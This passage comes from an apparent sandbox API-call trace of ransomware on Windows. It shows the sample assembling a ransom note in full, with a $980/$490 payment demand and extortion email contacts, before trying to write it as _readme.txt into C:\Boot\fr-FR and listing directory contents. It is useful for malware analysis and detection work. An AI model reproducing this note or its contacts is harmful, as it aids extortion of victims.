HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.951] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0183.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.951] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0183.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0183.954] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.954] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.954] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\_readme.txt" (normalized: "c:\\boot\\fr-fr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0183.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.955] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*" (normalized: "c:\\boot\\fr-fr\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.956] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.956] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.956] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.956] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.957] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.962] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.969] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.973] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.974] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.974] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.977] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.982] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.983] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.983] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.985] RtlAllocateHeap (HeapHandle=0x620000, 